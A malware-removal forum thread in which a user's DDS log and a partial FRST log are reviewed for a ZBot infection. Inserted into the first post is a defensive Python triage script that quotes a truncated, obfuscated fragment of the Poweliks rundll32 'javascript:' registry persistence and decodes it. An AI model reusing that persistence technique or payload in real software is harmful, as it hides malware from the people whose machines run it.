
ZBot, COM Surrogate, and all kinds of memory issues.


  • This topic is locked
9 replies to this topic

#1 prefect

prefect

  • Members
  • 10 posts
  • OFFLINE
  • Local time:02:13 PM

Posted 23 August 2014 - 12:14 PM

Background: On Wednesday I was infected with ZBot. After taking steps to remove the malware with Norton and MalWare removal programs, I think the infection is gone (well, if not, you'll notice before me). I made this topic

 

Since then, my computer's memory and CPU usage have been crippled. I can't open Chrome without hanging windows, and if I open more than one tab, I run the risk of crashing it. Opening a YouTube video crashes Shockwave. In Task Manager, COM Surrogate processes keep opening and eating memory. I've always had a memory leak, but now it's to the point where I can't use my computer. This has made things like checking Windows Update difficult, as COM Surrogate eats too much memory for it to open. I can open it by killing enough processes, but they come right back. I tried installing a backlog of updates, but I get "Windows could not configure updates, reverting." Due to the number of updates, it is too time-consuming to bother trying again just now.

 

In the topic I made, I was advised to run RKill:


Execution time: 0 hours(s), 26 minute(s), and 53 seconds(s)

First - For Rkill the times should not run much over 2 minutes (the 53 seconds is about average).

If it ever runs over 20 minutes then you do seem to have a problem.

I just ran a check on my Windows 8, and it took 0 hours(s), 1 minute(s), and 3 seconds(s).


Upon seeing that, I was told to post here. See the appropriate reports below.

 

DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16519
Run by Stephen at 12:34:06 on 2014-08-23
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.3798.607 [GMT -4:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Norton Internet Security *Disabled/Outdated* {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
SP: Norton Internet Security *Disabled/Outdated* {631E4324-D31C-783F-EC5C-35AD42B18466}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Norton Internet Security *Disabled* {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
.
============== Running Processes ===============
.
C:\windows\system32\svchost.exe -k DcomLaunch
C:\windows\system32\svchost.exe -k RPCSS
C:\windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\dwm.exe
C:\windows\system32\svchost.exe -k LocalService
C:\windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files\Classic Shell\ClassicShellService.exe
C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
C:\windows\system32\svchost.exe -k NetworkService
C:\windows\system32\WLANExt.exe
C:\windows\System32\spoolsv.exe
C:\windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\windows\system32\dashost.exe
C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
C:\Program Files\Intel\WiFi\bin\EvtEng.exe
C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\windows\SysWOW64\irstrtsv.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
C:\windows\system32\svchost.exe -k imgsvc
C:\Program Files\Windows Defender\MsMpEng.exe
C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
C:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\windows\system32\wbem\unsecapp.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\wbem\wmiprvse.exe
C:\windows\system32\taskhostex.exe
C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe
C:\Program Files\Classic Shell\ClassicStartMenu.exe
C:\windows\Explorer.EXE
C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
C:\Program Files\Tablet\Pen\WacomHost.exe
C:\Program Files\Tablet\Pen\Pen_Tablet.exe
C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1114.318_x64__8wekyb3d8bbwe\LiveComm.exe
C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe
C:\Program Files (x86)\Common Files\Microsoft Shared\Ink\TabTip32.exe
C:\windows\system32\SearchIndexer.exe
C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
C:\windows\system32\igfxext.exe
C:\Program Files (x86)\Samsung\Settings\sSettings.exe
C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\Windows\System32\RuntimeBroker.exe
C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files\Samsung\S Agent\CommonAgent.exe
C:\windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe
C:\Program Files\Samsung\Recovery\WCScheduler.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\windows\syswow64\dllhost.exe
C:\windows\system32\taskmgr.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\system32\RunDll32.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\syswow64\wwahost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Intel\Intel® ME FW Recovery Agent\bin\Bootstrap.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\System32\svchost.exe -k WerSvcGroup
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
C:\windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.conduit.com?SearchSource=10&CUI=UN47387223475202034&UM=2&ctid=CT3289663
uDefault_Page_URL = hxxp://samsung13.msn.com
mWinlogon: Userinit = userinit.exe
BHO: ExplorerBHO Class: {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
BHO: Norton Identity Protection: {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\coieplg.dll
BHO: Norton Vulnerability Protection: {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ips\ipsbho.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: ClassicIE9BHO Class: {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIE9DLL_32.dll
TB: Classic Explorer Bar: {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer32.dll
uRun: [googletalk] C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
uRun: [GoogleChromeAutoLaunch_7658F97A8AE129BDD15C9751079A5083] "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
uRun: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
uRun: [Dailtyqovoyxivw] C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [Adobe Reader Speed Launcher] "C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [Intel AppUp(SM) center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [Intel AppUp® center] "C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe" --domain-id F0399437-FD0C-4A48-B101-F0314A6172E4
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [TrojanScanner] C:\Program Files (x86)\Trojan Remover\Trjscan.exe /boot
StartupFolder: C:\Users\Stephen\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk - C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
uPolicies-Explorer: NoDriveTypeAutoRun = dword:145
IE: E&xport to Microsoft Excel - C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll/105
IE: Send to Bluetooth - C:\Program Files (x86)\Intel\Bluetooth\btSendToObject.htm
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE9_32.exe
IE: {64964764-1101-4bbd-8891-B56B1A53B9B3} - {553891B7-A0D5-4526-BE18-D3CE461D6310}
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
TCP: NameServer = 192.168.1.1 71.252.0.12
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8} : DHCPNameServer = 192.168.1.1 71.252.0.12
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\16A637F57657563747 : DHCPNameServer = 192.168.254.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\2656C6B696E6E2166636 : DHCPNameServer = 192.168.2.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\44A4850503 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\B41627964716358616E64756A7 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{00D8F6C9-C81F-4E7F-ADC0-ED2F4BF3EBB8}\D465E46403 : DHCPNameServer = 192.168.1.1 71.252.0.12
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\36.0.1985.143\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: ExplorerBHO Class: {449D0D6E-2412-4E61-B68F-1CB625CD9E52} - C:\Program Files\Classic Shell\ClassicExplorer64.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: ClassicIE9BHO Class: {EA801577-E6AD-4BD5-8F71-4BE0154331A4} - C:\Program Files\Classic Shell\ClassicIE9DLL_64.dll
x64-TB: Classic Explorer Bar: {553891B7-A0D5-4526-BE18-D3CE461D6310} - C:\Program Files\Classic Shell\ClassicExplorer64.dll
x64-Run: [IgfxTray] C:\windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\windows\System32\igfxpers.exe
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [BTMTrayAgent] rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {56753E59-AF1D-4FBA-9E15-31557124ADA2} - C:\Program Files\Classic Shell\ClassicIE9_32.exe
x64-IE: {64964764-1101-4bbd-8891-B56B1A53B9B3} - {553891B7-A0D5-4526-BE18-D3CE461D6310}
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
============= SERVICES / DRIVERS ===============
.
R3 AMPPAL;Intel® Centrino® Wireless Bluetooth® + High Speed Virtual Adapter;C:\windows\System32\Drivers\AmpPal.sys [2012-7-16 162344]
R3 BHDrvx64;BHDrvx64;C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.0.0.136\Definitions\BASHDefs\20130208.001\BHDrvx64.sys [2013-2-12 1388120]
R3 BthLEEnum;Bluetooth Low Energy Driver;C:\windows\System32\Drivers\BthLEEnum.sys [2012-7-25 202752]
S3 AMPPALP;Intel® Centrino® Wireless Bluetooth® + High Speed Protocol;C:\windows\System32\Drivers\AmpPal.sys [2012-7-16 162344]
.
=============== File Associations ===============
.
FileExt: .txt: txtfile=C:\windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-08-23 16:07:21 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{576D219F-5432-4235-80D3-86037A80A278}\offreg.dll
2014-08-23 15:43:33 78168 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-08-23 15:43:33 692568 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2014-08-23 13:37:50 11319192 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{576D219F-5432-4235-80D3-86037A80A278}\mpengine.dll
2014-08-23 13:08:08 -------- d-----w- C:\Program Files (x86)\Cisco
2014-08-23 13:07:55 -------- d-----w- C:\ProgramData\Intel.sav
2014-08-23 00:11:20 270496 ------w- C:\windows\System32\MpSigStub.exe
2014-08-22 20:16:31 144896 ----a-w- C:\windows\System32\tssdisai.dll
2014-08-22 16:38:29 2560 ----a-w- C:\Users\Stephen\AppData\Local\53534DF0.exe
2014-08-22 13:01:05 -------- d-----w- C:\Program Files (x86)\ESET
2014-08-21 22:59:39 -------- d-----w- C:\Program Files\CCleaner
2014-08-21 20:08:50 -------- d-----w- C:\NPE
2014-08-21 20:01:26 -------- d-----w- C:\Users\Stephen\AppData\Local\NPE
2014-08-21 16:40:46 -------- d-----w- C:\ProgramData\Licenses
2014-08-21 16:36:48 -------- d-----w- C:\ProgramData\Simply Super Software
2014-08-21 16:36:47 -------- d-----w- C:\Program Files (x86)\Trojan Remover
2014-08-21 16:35:14 -------- d-----w- C:\Users\Stephen\AppData\Local\Programs
2014-08-18 03:30:47 -------- d-----w- C:\Program Files\iPod
2014-08-18 03:30:45 -------- d-----w- C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-08-18 03:30:45 -------- d-----w- C:\Program Files\iTunes
2014-08-18 03:30:45 -------- d-----w- C:\Program Files (x86)\iTunes
.
==================== Find3M  ====================
.
2014-07-08 18:10:15 11204096 ----a-w- C:\windows\SysWow64\FlashPlayerInstaller.exe
.
============= FINISH: 12:57:24.47 ===============
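As an added triage example (not code from this thread, from DDS, or from FRST), here is a short Python script that pulls out of DDS/FRST-style log lines the three things a responder would want from the report above: how many dllhost.exe (COM Surrogate) instances appear in the process list, which autorun entries launch executables from a user's AppData folder (the randomly named `uRun: [Dailtyqovoyxivw]` entry above is what this turns up, alongside legitimate ones such as Google Talk, so the result is a review list rather than a verdict), and any CLSID LocalServer32 value that runs `rundll32.exe javascript:`, the fileless persistence that the FRST log further down this thread tags as Poweliks. The sample log is constructed after the lines posted in this thread with a placeholder SID; the obfuscated payload in that FRST line decodes by subtracting one from every character code, which the script does.

```python
"""Triage helper for DDS/FRST-style logs (added example, not part of this thread or of either tool)."""
import re

# Constructed sample lines, modelled on the DDS and FRST output posted in this thread.
# The SID is a placeholder; the localserver32 value is the one FRST tags as Poweliks.
SAMPLE_LOG = r"""
C:\windows\syswow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\windows\syswow64\dllhost.exe
C:\windows\syswow64\dllhost.exe
uRun: [googletalk] C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe /autostart
uRun: [Dailtyqovoyxivw] C:\Users\Stephen\AppData\Roaming\Niuzdoky\woivomk.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
HKU\S-1-5-21-0-0-0-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds
"""

# DDS "uRun:/mRun:" and FRST "HKU\...\Run:" entries: name in brackets, then the target path.
RUN_ENTRY = re.compile(r'Run: \[([^\]]+)\]\s*(?:=>\s*)?"?(.+?\.exe)', re.IGNORECASE)
# Executables living under a user profile's AppData tree.
APPDATA = re.compile(r'\\AppData\\(?:Roaming|Local)\\', re.IGNORECASE)
# CLSID LocalServer32 pointing at rundll32 with a javascript: "path" (no file on disk).
FILELESS_CLSID = re.compile(r'localserver32:\s*rundll32\.exe\s+javascript:', re.IGNORECASE)


def process_count(lines, image_name):
    """Count running-process lines whose image is `image_name` (e.g. dllhost.exe)."""
    suffix = "\\" + image_name.lower()
    return sum(1 for line in lines if line.strip().lower().endswith(suffix))


def appdata_autoruns(lines):
    """Return (entry name, target path) for autorun entries that start an .exe from AppData."""
    hits = []
    for line in lines:
        m = RUN_ENTRY.search(line)
        if m and APPDATA.search(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


def decode_shift(text, shift=1):
    """Undo a per-character code shift (the FRST sample decodes with shift=1)."""
    return "".join(chr(ord(c) - shift) for c in text)


def fileless_clsid_entries(lines):
    """Return (log line, decoded eval payload) for rundll32 javascript: LocalServer32 values."""
    out = []
    for line in lines:
        if FILELESS_CLSID.search(line):
            m = re.search(r'eval\("([^"]+)', line)
            out.append((line.strip(), decode_shift(m.group(1)) if m else ""))
    return out


def triage(log_text):
    """Summarise one DDS/FRST log into the three indicators discussed above."""
    lines = log_text.splitlines()
    return {
        "dllhost_count": process_count(lines, "dllhost.exe"),
        "appdata_autoruns": appdata_autoruns(lines),
        "fileless_clsid": fileless_clsid_entries(lines),
    }


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    print("dllhost.exe instances:", report["dllhost_count"])          # 3
    for name, path in report["appdata_autoruns"]:                     # googletalk, Dailtyqovoyxivw
        print("review autorun:", name, "->", path)
    for line, decoded in report["fileless_clsid"]:                    # document.write('<script language=jscr
        print("fileless CLSID:", line)
        print("  decoded payload:", decoded)
```

To use it on a real report, read FRST.txt or the DDS output into a string and pass it to `triage()` in place of `SAMPLE_LOG`; the AppData list is meant to be reviewed entry by entry, since legitimate per-user installers (Google Talk, Dropbox, Chrome) also live there.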

#2 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,054 posts
  • OFFLINE
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:07:13 PM

Posted 23 August 2014 - 12:18 PM

Greetings and welcome to BleepingComputer,
My name is xXToffeeXx, but feel free to call me Toffee if it is easier for you. I will be helping you with your malware problems.
 
A few points to cover before we start:

  • Do not run any tools without being instructed to as this makes my job much harder in trying to figure out what you have done.
  • Make sure to read my instructions fully before attempting a step.
  • If you have problems or questions with any of the steps, feel free to ask me. I will be happy to answer any questions you have.
  • Please follow the topic by clicking on the "Follow this topic" button, and make sure a tick is in the "receive notifications" and is set to "Instantly". Any replies should be made in this topic by clicking the "Reply to this topic" button.
  • Important information in my posts will often be in bold; make sure to take note of it.
  • I will attempt to reply as soon as possible, and normally within 24 hours of your reply. If this is not possible or I have a delay then I will let you know.
  • I will bump a topic after 3 days of no activity, and then will give you another 2 days to reply before a topic is closed. If you need more time than this please let me know.
  • Let's get going now.

==========================
 
Hi prefect,
 
Please download Farbar Recovery Scan Tool and save it to your Desktop.
 
Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Right-click FRST then click "Run as administrator" (XP users: click run after receipt of Windows Security Warning - Open File).
  • When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • When finished, it will produce a log called FRST.txt in the same directory the tool was run from.
  • Please copy and paste the log in your next reply.

Note 2: The first time the tool is run it generates another log (Addition.txt - also located in the same directory the tool was run from). Please also paste that, along with the FRST.txt into your next reply.
 
--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • FRST.txt
  • Addition.txt

xXToffeeXx~




#3 prefect

prefect
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  • Local time:02:13 PM

Posted 23 August 2014 - 12:44 PM

Hi Toffee,

Thanks for helping me with this. I'll try to be as responsive as possible. See the reports below.


Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 23-08-2014
Ran by Stephen (administrator) on GOINGLAPPY on 23-08-2014 13:40:31
Running from C:\Users\Stephen\Desktop
Platform: Windows 8 (X64) OS Language: English (United States)
Internet Explorer Version 10
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IvoSoft) C:\Program Files\Classic Shell\ClassicShellService.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\WTabletServiceCon.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Windows\System32\dasHost.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Condusiv Technologies) C:\Program Files\Condusiv Technologies\ExpressCache\ExpressCache.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Intel) C:\Program Files (x86)\Intel\irstrt\RapidStartConfig.exe
(IvoSoft) C:\Program Files\Classic Shell\ClassicStartMenu.exe
() C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TabletUser.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\sSettings.exe
(Wacom Technology) C:\Program Files\Tablet\Pen\WacomHost.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_Tablet.exe
(Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.0.1114.318_x64__8wekyb3d8bbwe\LiveComm.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Google) C:\Users\Stephen\AppData\Roaming\Google\Google Talk\googletalk.exe
(Dropbox, Inc.) C:\Users\Stephen\AppData\Roaming\Dropbox\bin\Dropbox.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\IntelAppStore\bin\ismagent.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccsvchst.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_6.2.9200.16683_none_62280e15510f8e79\TiWorker.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
